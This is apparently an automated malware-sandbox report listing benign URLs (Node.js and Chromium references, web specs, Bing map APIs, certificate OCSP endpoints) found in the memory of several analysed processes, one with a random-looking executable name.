                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt0/
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://narwhaljs.org)
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/ynA0%
                      Source: RtkAudUService64a.exe, 00000040.00000002.2496546660.000001FE48C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: svchost.exe, 00000001.00000002.1366639411.000001A164E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
                      Source: Launcher.exe, 00000000.00000000.1238969388.0000000002946000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1562259858.00000000015D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1756162409.00000000015D7000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384478764.00000000015D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10704
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1562259858.00000000015D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1756162409.00000000015D7000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384478764.00000000015D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crbug.com/v8/7848
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7231#section-6.4
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7238
                      Source: svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                      Source: svchost.exe, 00000001.00000002.1366898639.000001A164E72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366764570.000001A164E44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365912167.000001A164E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1366080231.000001A164E67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365510976.000001A164E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000001.00000002.1366898639.000001A164E72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365510976.000001A164E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 00000001.00000003.1365573628.000001A164E69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366864375.000001A164E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 00000001.00000002.1366898639.000001A164E72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365510976.000001A164E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365912167.000001A164E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1366080231.000001A164E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 00000001.00000003.1365573628.000001A164E69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366864375.000001A164E6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1366080231.000001A164E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000001.00000002.1366764570.000001A164E44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000001.00000002.1366764570.000001A164E44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
                      Source: svchost.exe, 00000001.00000003.1366106338.000001A164E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditP
                      Source: svchost.exe, 00000001.00000003.1365466125.000001A164E51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000001.00000002.1366764570.000001A164E44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 00000001.00000003.1265117155.000001A164E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
                      Source: svchost.exe, 00000001.00000003.1365573628.000001A164E69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366864375.000001A164E6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WICG/scheduling-apis
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/issues/575
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/antirez/linenoise
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/supports-color
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/heycam/webidl/pull/946.
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1501.
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mafintosh/pump
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mysticatea/abort-controller
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/13435
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/19009
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/31074
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/34532
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35475
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35862
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35981
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39707
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39758
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/21313
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30958
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/32887
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33515.
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34385
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35941
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
